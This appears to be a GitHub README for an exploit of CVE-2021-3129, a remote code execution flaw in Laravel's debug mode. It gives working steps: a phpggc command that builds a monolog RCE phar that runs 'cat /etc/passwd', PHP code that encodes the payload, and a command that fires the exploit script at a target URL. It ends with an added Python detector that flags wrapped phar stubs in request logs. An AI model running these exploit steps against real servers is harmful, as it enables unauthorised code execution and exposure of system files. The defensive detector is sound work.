Generate a phar archive that carries a custom command:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0
Run php -a to enter the PHP interactive shell, then:
$fp = fopen('php://output', 'w');                              // write to stdout
stream_filter_append($fp, 'convert.quoted-printable-encode');  // quoted-printable encode everything written
$size = "";                                                    // data to encode (left empty in the original)
fwrite($fp, iconv('utf-8', 'utf-16le', $size));                // convert to UTF-16LE, then emit
Save the generated payload to a file, then point the script at it:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar
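As an added defensive example (not code from this repository): the payload above is wrapped in UTF-16LE and then quoted-printable, so a log reviewer has to undo the quoted-printable layer before a phar stub becomes recognisable. The sample value below is constructed; `scan_values` and the marker list are assumptions of this example.

```python
import quopri

# Byte patterns that identify a PHAR stub. Because the chain on this page
# wraps the archive in UTF-16LE before quoted-printable, each marker is
# matched both as plain bytes and in its UTF-16LE form.
PHAR_MARKERS = (b"__HALT_COMPILER", b"<?php")

def decode_wrapped(blob: bytes) -> bytes:
    """Undo the quoted-printable layer (soft line breaks '=\\n' included).
    The UTF-16LE layer is left as-is; markers are matched in both forms."""
    return quopri.decodestring(blob)

def contains_phar_stub(blob: bytes) -> bool:
    """Return True if a (possibly wrapped) parameter value carries a PHAR stub."""
    decoded = decode_wrapped(blob)
    for marker in PHAR_MARKERS:
        if marker in decoded or marker.decode().encode("utf-16le") in decoded:
            return True
    return False

# Constructed sample: "<?php __HALT_COMPILER(); ?>" as UTF-16LE, then
# quoted-printable encoded, with one soft line break as an encoder inserts.
SAMPLE_WRAPPED = (
    b"<=00?=00p=00h=00p=00 =00_=00_=00H=00A=00L=00T=00_=00C=00O=00M=00P=00I=00L=00E=00R=00=\n"
    b"(=00)=00;=00 =00?=00>=00"
)
SAMPLE_BENIGN = b"hello=20world"  # constructed harmless value

def scan_values(values):
    """Classify captured parameter values (e.g. pulled from request logs)."""
    return {v: contains_phar_stub(v) for v in values}

if __name__ == "__main__":
    for value, hit in scan_values([SAMPLE_WRAPPED, SAMPLE_BENIGN]).items():
        print("PHAR stub" if hit else "clean", value[:40])
```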
0nion1/CVE-2021-3129
About
CVE-2021-3129-Laravel Debug mode